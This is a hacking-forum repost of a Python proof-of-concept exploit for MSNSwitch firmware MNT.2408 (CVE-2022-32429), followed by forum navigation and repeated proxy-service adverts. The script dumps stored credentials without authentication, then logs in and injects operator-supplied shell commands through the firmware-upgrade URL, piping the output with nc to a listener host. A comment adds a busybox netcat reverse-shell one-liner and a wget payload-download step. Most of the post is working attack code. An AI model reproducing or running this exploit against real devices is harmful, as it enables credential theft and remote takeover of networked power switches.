MSNSwitch Firmware MNT.2408 - Remote Code Execution

发布于3月5日3月5日

Members

Exploit Title: MSNSwitch Firmware MNT.2408 - Remote Code Exectuion (RCE)
Google Dork: n/a
Date:9/1/2022
Exploit Author: Eli Fulkerson
Vendor Homepage: https://www.msnswitch.com/
Version: MNT.2408
Tested on: MNT.2408 firmware
CVE: CVE-2022-32429

#!/usr/bin/python3


"""

POC for unauthenticated configuration dump, authenticated RCE on msnswitch firmware 2408.

Configuration dump only requires HTTP access.
Full RCE requires you to be on the same subnet as the device.

""" 

import requests
import sys
import urllib.parse
import readline
import random
import string


# listen with "ncat -lk {LISTENER_PORT}" on LISTENER_HOST
LISTENER_HOST = "192.168.EDIT.ME"
LISTENER_PORT = 3434

# target msnswitch
TARGET="192.168.EDIT.ME2"
PORT=80

USERNAME = None
PASSWORD = None

"""
First vulnerability, unauthenticated configuration/credential dump
"""
if USERNAME == None or PASSWORD == None:
	# lets just ask
	hack_url=f"http://{TARGET}:{PORT}/cgi-bin-hax/ExportSettings.sh"
	session = requests.session()

	data = session.get(hack_url)
	for each in data.text.split('\n'):
		key = None
		val = None

		try:
			key = each.strip().split('=')[0]
			val = each.strip().split('=')[1]
		except:
			pass

		if key == "Account1":
			USERNAME = val
		if key == "Password1":
			PASSWORD = val

"""
Second vulnerability, authenticated command execution

This only works on the local lan.

for full reverse shell, modify and upload netcat busybox shell script to /tmp:

	shell script: rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.X.X 4242 >/tmp/f
	download to unit: /usr/bin/wget http://192.168.X.X:8000/myfile.txt -P /tmp

ref: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#netcat-busybox
"""

session = requests.session()

# initial login, establishes our Cookie
burp0_url = f"http://{TARGET}:{PORT}/goform/login"
burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "Origin": f"http://{TARGET}", "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": "http://192.168.120.17/login.asp", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Connection": "close"}
burp0_data = {"login": "1", "user": USERNAME, "password": PASSWORD}
session.post(burp0_url, headers=burp0_headers, data=burp0_data)

# get our csrftoken
burp0_url = f"http://{TARGET}:{PORT}/saveUpgrade.asp"
data = session.get(burp0_url)

csrftoken = data.text.split("?csrftoken=")[1].split("\"")[0]

while True:
	CMD = input('x:')
	CMD_u = urllib.parse.quote_plus(CMD)
	filename = ''.join(random.choice(string.ascii_letters) for _ in range(25))

	try:
		hack_url = f"http://{TARGET}:{PORT}/cgi-bin/upgrade.cgi?firmware_url=http%3A%2F%2F192.168.2.1%60{CMD_u}%7Cnc%20{LISTENER_HOST}%20{LISTENER_PORT}%60%2F{filename}%3F&csrftoken={csrftoken}"

		session.get(hack_url, timeout=0.01)
	except requests.exceptions.ReadTimeout:
		pass

引用

Mention

查看数 701
已创建 3月5日3月5日
最后回复 3月5日3月5日

参与讨论

你可立刻发布并稍后注册。如果你有帐户，立刻登录发布帖子。

https://www.ishack.org/topic/1022.html/

粉丝

转到主题列表

欢迎来到红帽社区

红帽社区是由多名网络技术爱好者共同创建的社区论坛，您可以在底部选择语言和切换主题颜色，欢迎您的加入。

红龙逆向工具箱2025最新版(ISHACK改良版)
红龙逆向工具箱2025最新版(ISHACK改良版)

popy评论 ISHACK的文件的评论在红队武器库

Already expired
- 周二 11:345天前
- 0篇回复
Smart proxies新增50W美国IP池，诚邀您进行测试！！
Smart proxies新增50W美国IP池，诚邀您进行测试！！

Smartproxy海外IP发布主题帖子在建站VPS工具综合杂谈

你是否在尋找一款穩定、高效的IP代理工具，助力你的網路爬蟲、跨境電商、資料收集、遊戲加速或社群媒體管理？ Smart Proxy 為你提供大量高匿IP資源，全球覆蓋，安全穩定，滿足各類業務需求！為什麼選擇Smart proxies？海量IP池－覆蓋全球200+國家地區，輕鬆切換不同地區IP；高匿穩定－HTTP、HTTPS、SOCKS5協定支持，高匿名度，安全穩定；高速連線－優質線路，低延遲，確保流暢體驗；性價比高－彈性套餐，隨選購買，低成本高收益；便利操作－API呼叫支持，一鍵切換IP，適用於各種應用場景。適用場景：爬蟲資料收集，突破反爬限制跨境電商，防關聯操作遊戲加速，暢玩全球服社媒行銷，多帳號管理限時優惠活動現在註冊 Smart proxies，新用戶可享專屬折扣，更有免費流量等你體驗！官網位址： SmartProxies-涵盖全球220地区-真实纯净全球动态住宅ip 私人訂位；聯絡专属客戶經理：中国官网:https://www.smartproxycn.com/?keyword=0xweaz0l V X : Renxiaobo____
- 周二 05:335天前
- 0篇回复
Smart proxies－高速穩定IP代理，全球資源供你選擇
Smart proxies－高速穩定IP代理，全球資源供你選擇

Smartproxy海外IP发布主题帖子在建站VPS工具综合杂谈

你是否在尋找一款穩定、高效的IP代理工具，助力你的網路爬蟲、跨境電商、資料收集、遊戲加速或社群媒體管理？ Smart Proxy 為你提供大量高匿IP資源，全球覆蓋，安全穩定，滿足各類業務需求！為什麼選擇Smart proxies？海量IP池－覆蓋全球200+國家地區，輕鬆切換不同地區IP；高匿穩定－HTTP、HTTPS、SOCKS5協定支持，高匿名度，安全穩定；高速連線－優質線路，低延遲，確保流暢體驗；性價比高－彈性套餐，隨選購買，低成本高收益；便利操作－API呼叫支持，一鍵切換IP，適用於各種應用場景。適用場景：爬蟲資料收集，突破反爬限制跨境電商，防關聯操作遊戲加速，暢玩全球服社媒行銷，多帳號管理限時優惠活動現在註冊 Smart proxies，新用戶可享專屬折扣，更有免費流量等你體驗！官網位址： SmartProxies-涵盖全球220地区-真实纯净全球动态住宅ip 私人訂位；聯絡专属客戶經理：中国官网:https://www.smartproxycn.com/?keyword=0xweaz0l V X : Renxiaobo____
- 4月7日4月7日
- 0篇回复
Smart proxies－高速穩定IP代理，全球資源供你選擇
Smart proxies－高速穩定IP代理，全球資源供你選擇

Smartproxy海外IP发布主题帖子在建站VPS工具综合杂谈

可支持免费测试
- 4月1日4月1日
- 1篇回复
Smart proxies－高速穩定IP代理，全球資源供你選擇
Smart proxies－高速穩定IP代理，全球資源供你選擇

Smartproxy海外IP发布主题帖子在建站VPS工具综合杂谈

你是否在尋找一款穩定、高效的IP代理工具，助力你的網路爬蟲、跨境電商、資料收集、遊戲加速或社群媒體管理？ Smart Proxy 為你提供大量高匿IP資源，全球覆蓋，安全穩定，滿足各類業務需求！為什麼選擇Smart proxies？海量IP池－覆蓋全球200+國家地區，輕鬆切換不同地區IP；高匿穩定－HTTP、HTTPS、SOCKS5協定支持，高匿名度，安全穩定；高速連線－優質線路，低延遲，確保流暢體驗；性價比高－彈性套餐，隨選購買，低成本高收益；便利操作－API呼叫支持，一鍵切換IP，適用於各種應用場景。適用場景：爬蟲資料收集，突破反爬限制跨境電商，防關聯操作遊戲加速，暢玩全球服社媒行銷，多帳號管理限時優惠活動現在註冊 Smart proxies，新用戶可享專屬折扣，更有免費流量等你體驗！官網位址： SmartProxies-涵盖全球220地区-真实纯净全球动态住宅ip 私人訂位；聯絡专属客戶經理：中国官网:https://www.smartproxycn.com/?keyword=0xweaz0l V X : Renxiaobo____
- 3月29日3月29日
- 1篇回复

登录

MSNSwitch Firmware MNT.2408 - Remote Code Execution

recommended_posts

参与讨论

欢迎来到红帽社区

社区动态

红龙逆向工具箱2025最新版(ISHACK改良版)

Smart proxies新增50W美国IP池，诚邀您进行测试！！

Smart proxies－高速穩定IP代理，全球資源供你選擇

Smart proxies－高速穩定IP代理，全球資源供你選擇

Smart proxies－高速穩定IP代理，全球資源供你選擇

帐户

导航

搜索